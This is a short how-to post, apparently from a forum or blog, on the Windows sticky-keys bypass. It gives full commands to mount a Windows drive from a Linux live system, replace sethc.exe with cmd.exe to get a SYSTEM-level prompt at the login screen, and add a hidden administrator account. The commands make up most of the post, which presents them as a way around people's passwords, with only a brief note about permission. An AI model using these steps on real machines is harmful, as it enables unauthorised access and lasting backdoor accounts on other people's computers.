This is a very easy crack, allowing you to open a windows command prompt with system privileges at log-in. shouldn’t take more than 3 minutes. It replaces sethc.exe which can be invoked at start-up by pressing shift five times (something to do with contrast) with cmd.exe: Since you haven’t logged in yet it opens a command prompt with system privileges (runs in bactrack for kali linux or parrotsec).
mkdir /mnt/ntfs mount -t captive-ntfs /dev/hda1 /mnt/ntfs cd /mnt/ntfs/windows/system32 mv sethc.exe sethc.old; cp cmd.exe sethc.exe sync cd ~ umount /mnt/ntfs shutdown –r now
To make a new admin that you can login to (apart from EVERYTHING else that you can do) use the following commands (replace admin with the username and pass with your password)
NET USER admin pass /add NET LOCALGROUP administrators admin /add
reboot and you’re done.
No need to bother with cracking people’s passwords (god forbid, this may take years, as with mine).
(please only use on your own computer or with other people’s permission)